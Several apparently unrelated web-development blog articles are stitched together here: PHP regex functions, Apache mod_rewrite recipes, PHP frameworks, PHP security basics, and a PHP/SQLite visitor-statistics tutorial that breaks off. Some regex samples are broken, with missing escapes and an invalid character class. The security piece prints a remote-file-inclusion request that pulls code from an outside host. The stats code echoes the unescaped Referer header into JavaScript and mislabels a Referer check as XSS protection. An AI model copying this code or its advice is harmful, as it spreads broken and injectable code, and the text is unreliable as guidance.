1. What are Regular Expressions

The main purpose of regular expressions, also called regex or regexp, is to efficiently search for patterns in a given text. These search patterns are written using a special format which a regular expression parser understands.

Regular expressions are originating from Unix systems, where a program was designed, called grep, to help users work with strings and manipulate text. By following a few basic rules, one can create very complex search patterns.

As an example, let’s say you’re given the task to check wether an e-mail or a telephone number has the correct form. Using a few simple commands these problems can easily be solved thanks to regular expressions. The syntax doesn’t always seems straightforward at first, but once you learn it, you’ll realize that you can do pretty complex searches easily, just by typing in a few characters and you’ll approach problems from a different perspective.

2. Perl Compatible Regular Expressions

PHP has implemented quite a few regex functions which uses different parsing engines. There are two major parser in PHP. One called POSIX and the other PCRE or Perl Compatible Regular Expression.

The PHP function prefix for POSIX is ereg_. Since the release of PHP 5.3 this engine is deprecated, but let’s have a look at the more optimal and faster PCRE engine.

In PHP every PCRE function starts with preg_ such as preg_match or preg_replace. You can read the full function list in PHP’s documentation.

3. Basic Syntax

To use regular expressions first you need to learn the syntax. This syntax consists in a series of letters, numbers, dots, hyphens and special signs, which we can group together using different parentheses.

In PHP every regular expression pattern is defined as a string using the Perl format. In Perl, a regular expression pattern is written between forward slashes, such as /hello/. In PHP this will become a string, ‘/hello/’.

Now, let’s have a look at some operators, the basic building blocks of regular expressions

As an addition in PHP the forward slash character is escaped using the simple slash \. Example: ‘/he\/llo/’

To have a brief understanding how these operators are used, let’s have a look at a few examples:

Besides operators, there are regular expression modifiers, which can globally alter the behavior of search patterns.

The regex modifiers are placed after the pattern, like this ‘/hello/i’ and they consists of single letters such as i which marks a pattern case insensitive or x which ignores white-space characters. For a full list of modifiers please visit PHP’s online documentation.

The real power of regular expressions relies in combining these operators and modifiers, therefore creating rather complex search patterns.

4. Using Regex in PHP

In PHP we have a total of nine PCRE functions which we can use. Here’s the list:

• preg_filter – performs a regular expression search and replace
• preg_grep – returns array entries that match a pattern
• preg_last_error – returns the error code of the last PCRE regex execution
• preg_match – perform a regular expression match
• preg_match_all – perform a global regular expression match
• preg_quote – quote regular expression characters
• preg_replace – perform a regular expression search and replace
• preg_replace_callback – perform a regular expression search and replace using a callback
• preg_split – split string by a regular expression

The two most commonly used functions are preg_match and preg_replace.

Let’s begin by creating a test string on which we will perform our regular expression searches. The classical hello world should do it.

$test_string = 'hello world';

If we simply want to search for the word hello or world then the search pattern would look something like this:

preg_match('/hello/', $test_string);
preg_match('/world/', $test_string);

If we wish to see if the string begins with the word hello, we would simply put the ^ character in the beginning of the search pattern like this:

preg_match('/^hello/', $test_string);

Please note that regular expressions are case sensitive, the above pattern won’t match the word hElLo. If we want our pattern to be case insensitive we should apply the following modifier:

preg_match('/^hello/i', $test_string);

Notice the character i at the end of the pattern after the forward slash.

Now let’s examine a more complex search pattern. What if we want to check that the first five characters in the string are alpha numeric characters.

preg_match('/^[A-Za-z0-9]{5}/', $test_string);

Let’s dissect this search pattern. First, by using the caret character (^) we specify that the string must begin with an alpha numeric character. This is specified by [A-Za-z0-9].

A-Z means all the characters from A to Z followed by a-z which is the same except for lowercase character, this is important, because regular expressions are case sensitive. I think you’ll figure out by yourself what 0-9 means.

{5} simply tells the regex parser to count exactly five characters. If we put six instead of five, the parser wouldn’t match anything, because in our test string the word hello is five characters long, followed by a white-space character which in our case doesn’t count.

Also, this regular expression could be optimized to the following form:

preg_match('/^\w{5}/', $test_string);

\w specifies any alpha numeric characters plus the underscore character (_).

6. Useful Regex Functions

Here are a few PHP functions using regular expressions which you could use on a daily basis.

Validate e-mail. This function will validate a given e-mail address string to see if it has the correct form.

function validate_email($email_address)
{
    if( !preg_match("/^([a-zA-Z0-9])+([a-zA-Z0-9\._-])*@([a-zA-Z0-9_-])+
                     ([a-zA-Z0-9\._-]+)+$/", $email_address))
    {
        return false;
    }
    return true;
}

Validate a URL

function validate_url($url)
{
    return preg_match('|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?
                      (/.*)?$|i', $url);
}

Remove repeated words. I often found repeated words in a text, such as this this. This handy function will remove such duplicate words.

function remove_duplicate_word($text)
{
    return preg_replace("/s(w+s)1/i", "$1", $text);
}

Validate alpha numeric, dashes, underscores and spaces

function validate_alpha($text)
{
    return preg_match("/^[A-Za-z0-9_- ]+$/", $text);
}

Validate US ZIP codes

function validate_zip($zip_code)
{
    return preg_match("/^([0-9]{5})(-[0-9]{4})?$/i",$zip_code);
}

7. Regex Cheat Sheet

Because cheat sheets are cool nowadays, below you can find a PCRE cheat sheet that you can run through quickly anytime you forget something.

Meta Characters

Pattern Modifiers

8. Useful Readings

• 15 PHP Regular Expression for Web Developers
• Mastering Regular Expressions in PHP
• Introduction to PHP Regex

  

Mod_rewrite is an Apache-based rewrite engine for dynamically rewriting URLs. It’s built into Apache servers natively, though not enabled by default.

It’s capable of functions beyond simple rewrites, though, some of which are included below.

Turn Mod_Rewrite On

Mod_rewrite is used through your .htaccess file. Place the following code at the beginning of your .htaccess file to turn mod_rewrite on:

RewriteEngine on

(Don’t forget that .htaccess commands are case-sensitive.) This code needs to be entered at the beginning of any .htaccess file using mod_rewrite.

The Basic Mod_Rewrite Layout

The basic format for a mod_rewrite command is:

RewriteRule Pattern Substitution [Flag(s)]

URLs are Always Relative

The URL you redirect to is always relative to the directory in which your .htaccess file is placed. So if it’s in the root directory, URLs are all in relation to the root directory; if it’s in a sudirectory, URLs are in relation to that particular subdirectory.

A Basic Redirect

If you just want to create a simple 301 redirect from one URL to another, then use the following code:

RewriteRule ^fileone.html$ filetwo.html

This is a very basic rule that means any requests for fileone.html will be sent to filetwo.html.

Require no “www”

This bit of code will make it so visitors to your site don’t need to type in the “www” bit of your website address.

RewriteCond %{HTTP_HOST} !^domain\.com$ [NC]
RewriteRule ^(.*)$ http://domain.com/$1 [R=301,L]

Block a Specific IP Address

If you want to block someone coming from a specific IP address from accessing your website, you can use the following code:

RewriteCond %{REMOTE_ADDR} ^(A\.B\.C\.D)$
RewriteRule ^/* http://www.domain.com/sorry.html [L]

Replace the A\.B\.C\.D with the IP address you want to block (don’t forget to leave the “\” before each dot, which escapes the character).

Block Specific User Agents

If you want to block a group of IP addresses using the same User Agent (bot), the following code with do it:

RewriteCond %{HTTP_USER_AGENT} UserAgent
RewriteRule .* - [F,L]

Just replace the “UserAgent” bit with whatever user agent you want to block. You can also block more than one at a time by replacing the top line in that code with something like this:

RewriteCond %{HTTP_USER_AGENT} UserAgentA [OR]
RewriteCond %{HTTP_USER_AGENT} UserAgentB

You can put as many user agents in as you want, just make sure you end each line with [OR] (with the exception of the last line, of course).

Strip Query Strings

Let’s say all the pages on your site other than your home page are formatted as follows, with query strings instead of page names:

http://www.domain.com/home.html?example=12345abcd

Those aren’t very pretty, and on top of that, search engines will show a bunch of duplicated “home” pages. If you want to get rid of the query string in your page URLs, use the following code:

RewriteCond %{QUERY_STRING} example=
RewriteRule (.*) http://www.domain.com/$1? [R=301]

This not only gets rid of the query string, but also the preceding question mark.

Set up a Default Image

Using a default, backup image in case of broken images can make your site look more professional. Use the following code to redirect to a default image for any image whose file cannot be found.

RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^images/.*\.jpg$ /images/default.jpg [L]

Of course, you can change the “.jpg” bit to whatever file type you’re using. Make sure you have an image called “default.jpg” or change that to whatever your default image filename is.

Prevent Hotlinking

The last thing most website owners want is other sites stealing their content or worse—hotlinking to their images and stealing their bandwidth. Here’s a simple bit of code that prevents it:

RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?domain.com/ .*$ [NC]
RewriteRule \.(gif|jpg|swf|flv|png)$ /feed/ [R=302,L]

Make sure you change the “domain.com” bit to your own domain name.

Redirect to a Maintenance Page

If you need to take your entire site offline for a bit and redirect to a maintenance page (or some other page), use the following code:

RedirectMatch 302 ^/ /maintenancepage.html

Change the “maintenancepage.html” bit to wherever your maintenance page file is located.

Redirect Multiple Domains to a Single Domain

If you have multiple domains pointing to your site, it’s possible you could take a hit in the search engines for having duplicate content. Use the following code to redirect visitors from two domains to just one:

RewriteCond %{HTTP_HOST} ^www.domain.net$ [NC,OR]
RewriteCond %{HTTP_HOST} ^domain.net$ [NC,OR]
RewriteCond %{HTTP_HOST} ^www.domain.net$ [NC]
RewriteRule ^(.*)$ http://domain.net/$1 [R=301,L]

Remember the Filesystem Always Takes Precedence

The filesystem on your server will always take precedence over the rewritten URL. For example, if you have a directory named “services” and within that directory is a file called “design.html”, you can’t have the URL redirect to “http://domain.com/services”. What happens is that Apache goes into the “services” directory and doesn’t see the rewrite instructions.

To fix this, simply rename your directory (adding an underscore to the beginning or end is a simple way to do that).

Remember:

• Because mod_rewrite works within the .htaccess file, commands are case sensitive.
• Always back up your .htaccess file before making any changes to it. This way, if there’s a problem, you can easily restore your site.

More Resources:

• Modrewrite.com – This is a great site that offers a forum, a beginner’s guide, and links to more information about mod_rewrite.
• Mod_Rewrite Tips and Tricks – A great article on the basics of mod_rewrite and some beginner and advanced techniques.
• Mod Rewrite Tips and Tricks – This site offers a few basic tips for mod_rewrite.
• Apache Mod_Rewrite Cheat Sheet – This cheat sheet offers information on the most-used items for building a mod_rewrite pattern.
• Learn Apache mod_rewrite: 13 Real-World Examples – This is a much more advanced article from SitePoint.
• Module mod_rewrite URL Rewriting Engine – The official documentation from Apache.
• .htaccess Rewrite Tips for Using RewriteRule and RewriteCond for .htaccess mod_rewrite – A great guide to a number of different mod_rewrite patterns.
• Tip for Configuring Apache’s Mod_Rewrite – Five great tips for mod_rewrite configuration.
• Several Mod_Rewrite Tricks for a Better Web Application – Covers a number of basic and more advanced mod_rewrite tricks.

Author: Cameron Chapman

Cameron Chapman is a writer, blogger, copyeditor, and social media addict. She’s been designing for more than six years and writing her whole life. If you’d like to connect with her, you can follow her on Twitter or at her Personal Website.

Write for Us! We are looking for exciting and creative articles, if you want to contribute, just send us an email.

  

What is a PHP Framework?

PHP is the world’s most popular scripting language for many different reasons – flexibility, ease-of-use, among others – but often times coding in PHP, or any language for that matter, can get rather monotonous and repetitive. That’s where a PHP framework can help.

PHP frameworks streamline the the development of web applications written in PHP by providing a basic structure for which to build the web applications. In other words, PHP frameworks help to promote rapid application development (RAD), which saves you time, helps build more stable applications, and reduces the amount of repetitive coding for developers. Frameworks can also help beginners to build more stable apps by ensuring proper database interaction and coding on the presentation layer. This allows you to spend more time creating the actual web application, instead of spending time writing repetitive code.

The general idea behind the workings of a PHP framework is referred to as Model View Controller (MVC). MVC is an architectural pattern in programming that isolates business logic from the UI, allowing one to be modified separately from the other (also known as separation of concerns). With MVC, Model refers to data, View refers to the presentation layer, and Controller to the application or business logic. Basically, MVC breaks up the development process of an application, so you can work on individual elements while others are unaffected. Essentially, this makes coding in PHP faster and less complicated.

Why Should we use a PHP Framework?

Developers should utilize PHP frameworks for various reasons, but the number one reason is for speeding up the development process. Reusing code across similar projects will save the developer a substantial amount of time and effort. A framework offers pre-built modules for performing tedious coding tasks, so the developer can spend their time on developing the actual application rather than re-building the foundation with each and every project.

Stability is another big reason developers are utilizing frameworks. While simplicity is one of PHP’s greatest assets, and the reason many people prefer to use this scripting language, it can also be one of its biggest downfalls. It’s fairly easy, especially for beginners, to write bad code and not even realize it. With PHP the application will often times still work, but unknowingly you may have opened up a large security hole in your coding that may be susceptible to attacks. It’s important to remember that PHP is a very forgiving language, so it’s even more important to make sure to tie up any loose ends in your coding – even if the application seems to be working properly.

Finally, the availability of PHP frameworks is extensive, and there are many different frameworks to choose from. You can even create your own, although many developers elect to choose from any of the most well-known frameworks due to their popularity, large support teams, and their forums/communities that allow you to interact with other developers who utilize the same framework. As a side note, you should always examine your project to first decide if you should even use a framework or not. Some questions you should ask yourself are: Will it save you, and anyone else who may use it, time and effort? Will the app perform better? Will it improve stability? If you can answer yes to any of these questions, a PHP framework may be the right answer for that particular project.

When to use a PHP Framework?

This is a common question amongst experienced and beginner developers alike, and there’s really no direct answer to the question. For many beginners, a framework will offer greater simplicity as well stability, so it may be a good idea to use PHP frameworks whenever possible. It will help reduce or eliminate bad coding and speed up the build process.

On the other hand, many experienced PHP programmers see frameworks as tools for “weak” programmers that don’t understand how to write good, clean code. Whether this is true or not is up for debate, but the fact of the matter is that PHP frameworks are a tool that can be used to save time and tighten up one’s coding.

When working on a project with tight deadlines, utilizing a PHP framework is a huge benefit that can greatly speed up the coding process. So if you’re in a time crunch, PHP frameworks can be very beneficial to you. Another instance when PHP frameworks should be a consideration is when you’re working on projects with substantial amounts of monotonous coding, because it will help make the job much less tedious.

What to Look for in a PHP Framework?

There’s plenty of options available to anyone who may be searching for PHP frameworks, and there’s even the option of creating your own, although that’s only recommended for PHP experts. When searching for the the PHP framework best suited for your needs, it’s important to keep in mind who will be using and/or modifying your applications from top to bottom. If there are many people who will be using the application, it may be best use a popular PHP framework that many developers are familiar with. On the other hand, if you wish to build web applications for your own personal use, you are better off choosing any PHP framework that you’re comfortable with – whether it’s popular amongst the developer community or not.

Various factors to search for in a PHP framework include: easy of use, rapid development/performance, popularity amongst other developers, strong features, and support/forums. It’s recommended to try out several PHP frameworks when you’re first starting out in order to find one that suits your needs the best. All frameworks are slightly different and have varying strengths and weaknesses, for instance Zend Framework has been around since V3 and is full of features plus has an extensive support system in place since it has been around for so long. On the contrary, CakePHP is another PHP framework which is younger than Zend Framework and has slightly less of a support system in place (although support for this framework is growing rapidly), but is much more user-friendly and easy to use.

As you can see, each type of PHP framework has its own advantages, so it’s best to use a bit of trial and error to figure out which one will work the best for your needs. Another excellent way of choosing a framework is to consult your colleagues in the development community to see which ones they prefer. Those who have actually used a specific framework will be able to inform you of the ease-of-use, features, support availability, scope of the community surrounding the framework, and possible shortfalls.

Most Common Mistakes When Using a PHP Framework

Mistakes are possible in any type of programming, but PHP frameworks help to limit these mistakes greatly by providing good quality code that is tried and true from the start of the development process. Repetitive coding seems to promote mistakes now and then, and frameworks all but eliminate that problem.

That being said, there are still things to be careful of when utilizing any PHP framework. For instance, unless you are an expert in PHP programming, you should always opt for using a popular framework with plenty of support and an active user base (see below for examples of popular PHP frameworks). There are many frameworks out there that have little or no support, and/or they were created by individuals with limited knowledge of PHP. These types of frameworks can cause your applications to not function properly, and worse case scenario, could cause catastrophic security issues with your website.

Another somewhat common mistake is not ensuring your database and web server is compatible with the particular framework. For example, Seagull PHP Framework recommends the following configuration:

• PHP: PHP 4.3.0 is the minimum, later versions work fine, as do versions PHP 5.1.1 and above. Avoid anything in the 5.0.x series
• MySQL: MySQL 4.0.x, 4.1.x and 5.0.x are all supported. You can also use 3.23.x.
• Apache: Seagull works fine with 1.3.x and 2.x series of Apache

If you don’t meet these requirements, you won’t be observing the best performance possible from your chosen framework. Even if you are an expert in PHP, you should always go over the documentation of the framework to confirm compatibility before trying it out.

Similar to the previously mentioned common mistake, not following the recommended installation process of your PHP framework can also give you some headaches. Take Seagull as an example again – the Seagull wiki has a detailed rundown of the framework’s installation process that has several key steps that are sometimes easily overlooked by careless or unsuspecting developers. The key is to take your time setting up the framework and follow the installation instructions to the “T” – The time you’ll save actually developing applications later will more than make up for the few extra minutes spent installing the framework correctly the first time.

What are the Best PHP Frameworks Available?

Within the past few years as PHP has evolved as the scripting language of choice by most developers, there have been an explosion of PHP frameworks to hit the scene. There is a great debate about what the best PHP frameworks are, because the simple fact is that not every framework is built for everyone. Here’s a quick rundown of five of the best and most popular choices right now:

The Zend Framework

The Zend Framework has a massive following amongst the development community and is focused on web 2.0 style applications. Because of their massive following, extensive support and active user base, Zend is referred to as “The PHP Company”. Zend is one of, if not, the most popular PHP frameworks available today. It has robust features that are built for corporate-level development, and it requires an extensive knowledge of PHP.

CakePHP

CakePHP is a great choice for beginners to advanced PHP developers. It’s based on the same principles that Ruby on Rails is designed around, and it’s heavily focused on rapid development – making it a great framework to be used for rapid application development. Its rapidly growing support system, simplicity, and scalability make CakePHP one of the most popular PHP frameworks available today.

Symfony

Symfony is aimed more at advanced developers who’s main objective is to create enterprise-level applications – most notably Askeet and Yahoo! Bookmarks. This open source PHP framework is full of features and can do it all, but it’s main downfall is that it is a bit slower than other frameworks.

Codelgniter

Codelgniter is well-known for its ease-of-use, performance and speed. Unlike Symfony, this PHP framework is ideal for shared hosting accounts or for when you want a framework with a small footprint. It offers simple solutions, and has an extensive library of video tutorials, forums, a user guide and wiki available for support. Beginners should consider using Codelgniter.

Seagull

Seagull is a well-established PHP framework used for building web, command line and GUI apps. It is an extremely easy to use framework that is ideal for beginners to advanced coders. For beginners, Seagull features a library of sample applications that can be customized to fit your needs, and for experts, Seagull offers a host of options – including best practices, standards, and modular codebase – for building web applications quickly and easily. Seagull has an active developer community and plenty of support documentation in place as well.

Summary

PHP frameworks are a great way for developers of all skill levels to reduce the need for repetitive coding, speed up the development process, and to ensure proper coding when creating web applications. This not only speeds up the development of rich applications, but it also tightens up PHP security by reducing the risk of security holes in your coding.

While some expert PHP coders do not feel the need to use frameworks to develop web apps, they can still be an advantage in situations where rapid development is necessary, such as under tight deadlines. And for beginner to intermediate developers, frameworks can enhance the PHP learning process while promoting good coding practices and reducing bad coding, which is common in PHP due to its “forgiving” nature.

There are many PHP frameworks available today, and thus developers are sure to find a framework that fits there needs in terms of features, support, speed, scalability and more. Some of the top PHP frameworks used by developers today include: The Zend Framework, CakePHP, Symfony, Codelgniter, and Seagull.

  

Defining PHP Security and It’s uses

PHP is the most popular web programming languages in use today due in large part to the fact that it’s a highly flexible syntax that can perform many functions while working flawlessly in conjunction with html – Plus it’s relatively easy to learn for beginners, yet it’s powerful enough for advanced users as well. It also works exceptionally well with open source tools, such as the Apache web server and MySQL database. In other words, its versatility is unsurpassed when compared to other scripting languages, making it the language of choice for many programmers.

Though many programmers and developers may be implementing PHP in their websites, the issue of PHP security is often overlooked when building a site. Insecure coding is rather common in PHP due to the fact that it’s such a forgiving language that will often “work” even when there are a few loose ends in the coding. These “loose ends” are what hackers are looking for, and in PHP, they’re not that hard to find. The key is for you to find them first, and to leverage PHP’s unique features to minimize your security vulnerability.

PHP Security involves minimizing programming errors as much as possible, and putting proper code in place to protect against possible vulnerabilities – Often times this means putting 2-3 “layers” of protection in place to guard sensitive data against hackers that could otherwise cause a catastrophic result if compromised. Developers call this principle of redundant safeguarding Defense in Depth, and this concept has been proven over the years to be an extremely effective defense against malicious attacks.

Types of Attacks

There are various types of attacks that PHP is particularly vulnerable to, and any website that sends or receives information is at risk of an attack – ranging from an annoyance to catastrophic – so it’s important to put the proper security in place to minimize the risk. The two main types of attacks are human attacks and automated attacks – Both of which can potentially devastate a website.

The most common type of human attacks are little more than annoyances and are common at file storage sites and forums, such as abusing file storage policy, defamation, lobbying at sites such Amazon or Yahoo Answers, and other similar abuse that doesn’t necessarily involve manipulation of your website’s source code. Humans can also find security holes that allow them to access source code and use it maliciously. This can potentially cause substantial damage to your website, so this is the type of human attack you should focus your efforts on.

Automated attacks are particularly dangerous because of their efficiency in using the power of automated scripts to wreak havoc on your website in a number of different ways. These attacks may slow down your site, access the error logs, manipulate the source code, or compromise sensitive information – The possibilities are seemingly endless. The most common, and notorious, type of automated attack are viruses and worm, which are slightly different in nature but are similar in the way that they can potentially harm a website.

The goal of PHP security is to minimize, and ultimately eliminate, the potential for both human and automated attacks by putting into place strategic lines of defense to eliminate access to your site by unverified users. The way you go about doing this is to target the most common types of PHP security breaches first, so that you make your website airtight against malicious attacks. So what are the most common types of PHP security breaches?

Most Common PHP Security Vulnerabilities

Experienced hackers know the most common types of security holes to look for in PHP, so it’s important to address these issues first. It doesn’t matter whether you’re a beginner or expert PHP programmer, every programmer makes mistakes now and then, and hackers will find it if you don’t first.

1. Register_Globals

Register_Globals makes writing PHP applications simple and convenient for the developer, but it also poses a potential security risk. This setting is located in PHP’s configuration file, which is php.ini, and it can be either turned on or off. When turned on, it allows unverified users to inject variables into an application to gain administrative access to your website. Most, if not all, PHP security experts recommend turning register_globals off.

For example take a look at the code snippet below. A user could append the end of a page’s url with ?admin=1 to basically force entry to administrative areas that would normally require a password.

With register_globals turned off, this type of forced entry isn’t possible. The good news is that PHP 4.2.0 has register_globals turned off as its default setting, and PHP 6.0.0 has actually removed the feature. While some developers frown upon this move because register_globals off makes programming in PHP slightly more time-consuming, but in terms of PHP security it’s a crucial step in the right direction.

So instead of relying on register_globals, you should instead go through PHP Predefined Variables, such as $_REQUEST. To further tighten security, you should also specify by using: $_ENV, $_GET, $_POST, $_COOKIE, or $_SERVER instead using the more general $_REQUEST.

2. Error Reporting

Error reporting is a great tool for diagnosing bugs and allowing you to fix them quicker and easier, but it also poses a potential security threat. The problem occurs when the error is visible to others on-screen, because it reveals possible security holes in your source code that a hacker can easily take advantage of. If display_errors is not turned off, or have a value of “0”, the output will appear on the end user’s browser – Not good for security! You do, however, want to set log_errors to on, and then indicate the exact location of the log with error_log.

Take a look at the table below from PHPFreaks.com, which points out the recommended settings for both production and development instances of PHP web applications.

3. Cross-Site Scripting (XSS)

Cross-site scripting, or XSS, is a way for hackers to gather your website’s user data by using malicious markup or JavaScript code to trick a user, or their browser, to follow a bad link or present their login details to a fake login screen that instead of logging them in, steals their personal information. The best way to defend against XSS is to disable JavaScript and images while surfing the web, but we all know that’s nearly impossible with so many websites using JavaScript’s rich application environment these days.

To defend against XSS attacks, you need to be proactive – Don’t wait until your website has already been exploited. For instance, PHP applications that use form submission, or POST requests, are much less vulnerable than GET requests. So it’s very important that you spell out which variables and actions will be allowed as GET values, and also which ones must come via POST values. In a nutshell, defending against XSS involves controlling the user input at your site and making sure that it goes through a filtering process to ensure that it’s void of malicious code.

An example of filtering user input can be found in the snippet of code below that was taken from Pro PHP Security by Chris Snyder and Michael Southwell.

This relatively straightforward piece of code works by preventing html and JavaScript from being embedded in the input, which results in a completely safe version of the input. This is especially useful for comment sections of a blog, forums and other web applications that receive user input.

Also useful for protecting against XSS is a useful PHP function called htmlentities(). This simple function works by converting all characters in html to their corresponding entities, such as “<” would convert to “<” (without the quotes).

4. Remote File Inclusion (RFI)

This type of attack is relatively unknown amongst developers, which makes it an especially damaging threat to PHP security. Remote file inclusion, or RFI, involves an attack from a remote location that exploits a vulnerable PHP application and injects malicious code for the purpose of spamming or even gaining access to the root folder of the server. An unverified user gaining access to any server can wreak major havoc on a website in many different ways, including abusing personal information stored in databases.

A great example of an RFI attack can be found atPHPFreaks.com. Here’s an exerpt from that page:

Imagine that at http://example.com/malice.php a file exists and our script is located at http://site.com/index.php. The attacker will do this request: http://site.com/index.php?page=http://example.com/malice. This file will get executed when it is included and it will a write a new file to the disk.

The best way to secure your site from RFI attacks is through php.ini directives – Specifically, the allow_url_fopen and the allow_url_include directives. The allow_url_fopen directive is set to on by default, and the allow_url_include is set to off. These two simple directives will adequately protect your site from RFI attacks.

Other PHP Security Tools

While the most effective way to secure PHP web application is through accurate coding and vigilante monitoring of your site, there are other helpful tools out there that can help to quickly and easily point out possible vulnerabilities in your PHP coding. Here are three useful tools that can be beneficial to PHP developers:

- PhpSecInfo

This useful tool reports security information in the PHP environment, and best of all, it offers suggestions for improving the errors. It’s available for download under the “New BSD” license, and the PhpSecInfo project is always looking for more PHP developers to help improve this tool.

Download PhpSecInfo Here.

- PHP Security Scanner

This is a tool used to scan PHP code for vulnerabilities, and it can be used to scan any directory. PHP Security Scanner features a useful UI for better visualization of potential problems, and it supports basic wild card search functionality for filtering directories or files that are to be searched.

Download PHP Security Scanner Here

- Spike PHP Security Audit Tool

The Spike PHP Security Audit Tool is an open source solution for doing static analysis of PHP code. It will search for security exploits, so you can correct them during the development process.

Download Spike PHP Security Audit Tool Here

  

When creating a website, one main goal is to attract visitors. Traffic generation is a necessity for monetary purposes, showing off your work, or just expressing your thoughts. There are many ways to create traffic for your website. Search engines, social bookmarking, and word of mouth are just a few examples. But how do you know whether this traffic is genuine? How do you know if your visitors are coming back for a second time?

These questions have raised the concept of web statistics. Often times, webmasters use certain programs, such as Google Analytics or Awstats, to complete this job for them. These programs obtain a wide variety of information about visitors to a site. They find page views, visits, unique visitors, browsers, IP addresses, and much more. But how exactly is this accomplished? Follow along as we present a tutorial on how to create your own web statistics program using PHP, JavaScript, AJAX, and SQLite.

View Demo of your Own Stats Program

To begin, let’s start with some simple HTML markup that will act as the page we are tracking:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Web Statistics</title>
</head>
<body>

<h2 id="complete"></h2>

</body>
</html>

The h2#complete element will be filled dynamically with JavaScript once the page view has successfully been tracked by our web statistics. To initiate this tracking, we can use jQuery and an AJAX request:

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type='text/javascript'>
$(function() {
	// Set the data text
	var dataText = 'page=<?php echo $_SERVER['REQUEST_URI']; ?>&referrer=<?php echo $_SERVER['HTTP_REFERER']; ?>';

	// Create the AJAX request
	$.ajax({
		type: "POST",                    // Using the POST method
		url: "/process.php",             // The file to call
		data: dataText,                  // Our data to pass
		success: function() {            // What to do on success
			$('#complete').html( 'Your page view has been added to the statistics!' );
		}
	});
});
</script> 

Consider the above code step by step:

• When the DOM is ready, we first set our dataText. This text is in query string format and will be sent as data to process.php, which will track this page view.
• We then create an AJAX request that uses the POST method to send form data.
• Our form data (dataText) is then sent to process.php in the root of our server.
• Once this request is completed, the h2#complete element is filled with a successful notice

Our next job is to write process.php. Its main goal is to obtain information about the web statistics and store it in a database. Since our database has not yet been made, we must create a simple file, install.php, which will do this for us:

<?php
	# Open the database
	$handle = sqlite_open( $_SERVER['DOCUMENT_ROOT'].'stats.db', 0666, $sqliteError ) or die(  $sqliteError  );

	# Set the command to create a table
	$sqlCreateTable = "CREATE TABLE stats(page text UNIQUE, ip text, views UNSIGNED int DEFAULT 0, referrer text DEFAULT '')";

	# Execute it
	sqlite_exec( $handle, $sqlCreateTable );

	# Print that we are done
	echo 'Finished!';
?>

This code is mostly straightforward. It opens up a database (stats.db) in the root of the server and creates a database for it. The string inside $sqlCreateTable is a SQLite command that makes our statistics table. This table contains four colums: Page, IP Address, Views, and Referrer:

• Page is a String that contains the page being viewed as a relative link (i.e. /index.php).
• IP Address is also a String that contains a list of IP Addresses that visited this page. It is in the format of numVisits1(IP Address1) numVisits2(IP Address2) numVisits3(IP Address3) etc. For example, if we obtained 10 visits from 74.35.286.15 and 5 visits from 86.31.23.78 (hypothetical ip addresses), this String would be "10(74.25.286.15) 5(86.31.23.78)".
• Views is an integer containing the number of times the page has been viewed.
• Referrer is a String in the same format as IP Address. It contains all referrers to this page and how many referrals have been made.

And now onto process.php:

# Connect to the database
$handle = sqlite_open( $_SERVER['DOCUMENT_ROOT'].'/stats.db', 0666, $sqliteError ) or die( $sqliteError );

# Use the same-origin policy to prevent cross-site scripting (XSS) attacks
# Remember to replace http://yourdomain.com/ with your actual domain
if( strpos( $_SERVER['HTTP_REFERER'], 'http://yourdomain.com/' ) !== 0 ) {
     die( "Do not call this script manually or from an external source." );
}

# Obtain the necessary information, strip HTML tags, and escape the string for backup proetection
$page = sqlite_escape_string( strip_tags( $_POST['page'] ) );
$referrer = sqlite_escape_string( strip_tags( $_POST['referrer'] ) );
$ip = sqlite_escape_string( strip_tags( $_SERVER['REMOTE_ADDR'] ) );

# Query the database so we can update old information
$sqlGet = 'SELECT * FROM stats WHERE page = \''.$page.'\'';
$result = sqlite_query( $handle, $sqlGet );

This first snippet connects to our stats database and gets the information we need for the current visit. It also queries the database and obtains any information previously stored. We use this information to create an updated table.

The next job is to find old information:

# Set up a few variables to hold old information
$views = 0;
$ips = '';
$referrers = '';

# Check if old information exists
if( $result && ( $info = sqlite_fetch_array( $result ) ) ) {
	# Get this information
	$views = $info['views'];
	$ips = $info['ip'].' ';
	if( $info['referrer'] )
		$referrers = $info['referrer'].' ';

	# Set a flag to state that old information was found
	$flag = true;
}

The above code finds all previous information in our table. This is vital, as we need to update the number of views (increase it by one), IP addresses, and referrers.

# Create arrays for all referrers and ip addresses
$ref_num = array();
$ip_num = array();

# Find each referrer
$values = split( ' ', $referrers );

# Set a regular expression string to parse the referrer
$regex = '%(\d+)\((.*?)\)%';

# Loop through each referrer
foreach( $values as $value ) {
	# Find the number of referrals and the URL of the referrer
	preg_match( $regex, $value, $matches );

	# If the two exist
	if( $matches[1] && $matches[2] )
		# Set the corresponding value in the array ( referrer link -> number of referrals )
		$ref_num[$matches[2]] = intval( $matches[1] );
}

# If there is a referrer on this visit
if( $referrer )
	# Add it to the array
	$ref_num[$referrer]++;

# Get the IPs
$values = split( ' ', $ips );

# Repeat the same process as above
foreach( $values as $value ) {
	# Find the information
	preg_match( $regex, $value, $matches );

	# Make sure it exists
	if( $matches[1] && $matches[2] )
		# Add it to the array
		$ip_num[$matches[2]] = intval( $matches[1] );
}

# Update the array with the current IP.
$ip_num[$ip]++;

The above two loops are very similar. They take in the information from the database and parse it with regular expressions. Once this information is parsed, it is stored in an array. Each array is then updated with the information from the current visit. This information can then be used to create the final String:

# Reset the $ips string
$ips = '';

# Loop through all the information
foreach( $ip_num as $key => $val ) {
	# Append it to the string (separated by a space)
	$ips .= $val.'('.$key.') ';
}

# Trim the String
$ips = trim( $ips );

# Reset the $referrers string
$referrers = '';

# Loop through all the information
foreach( $ref_num as $key => $val ) {
	# Append it
	$referrers .= $val.'('.$key.') ';
}

# Trim the string
$referrers = trim( $referrers );

The final strings are now created. IPs and Referrers are in the form: “numVisits1(IP/Referrer1) numVisits2(IP/Referrer2) etc.” For example, the following could be the referrer String:

5(http://www.noupe.com) 10(http://css-tricks.com)

